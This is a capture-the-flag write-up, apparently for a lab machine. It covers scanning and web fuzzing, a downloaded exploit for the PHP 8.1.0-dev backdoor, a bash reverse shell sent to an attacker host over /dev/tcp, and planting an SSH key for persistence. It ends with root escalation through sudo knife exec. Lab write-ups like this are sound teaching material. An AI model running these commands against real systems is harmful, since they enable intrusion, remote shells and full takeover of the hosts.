USER

## NMAP for scan 

> $ nmap -sV -sC --script vulners -v -p- 10.10.10.242 | tee nmap.log

## Try to Bruteforce WebDomain
 
 Domain bruteforce with wfuzz

> $ wfuzz -c -v -z file,big.txt --hc '404' http://10.10.10.245/FUZZ

## Enumerating WebServer
when we parse the requests in the browser's buffer we can check a php version that has a PHP 8.1.0 - dev bug

There had been a very recent RCE exploit for this version of the PHP.

https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html

I downloaded the code from the link above and saved it as exploit.py.

wget https://packetstormsecurity.com/files/download/162749/php_8.1.0-dev.py.txt -O exploit.py

Next, I ran some commands to verify the exploit.

python3 exploit.py -u http://10.10.10.242/ -c "id"

Now, my next step would be spawning a reverse shell. Hence, I started listening on the port 4444.

nc -nlvp 4444 

python3 exploit.py -u http://10.10.10.242/ -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.60/4444 0>&1'"

##Escalating SSH

Likewise, I got the user flag. I copied my public key to the machine to get the SSH access. Somehow, the private key of the target didn’t work for me.

echo __public_key__ > ~/.ssh/authorized_keys

on local machine
ssh james@10.10.10.242 -i ~/.ssh/id_rsa


#Priv Escalation - ROOT

I have used LinEnum.sh to give all information that james user have acess.

with:

> $ sudo -l 

we get:

The user could execute the binary knife as the root and without requiring his own password. So, I decided to run what the binary did.

in GTFobins have some notes about knife server manager

> $ sudo knife exec -E 'exec "/bin/sh"'

and we got it!

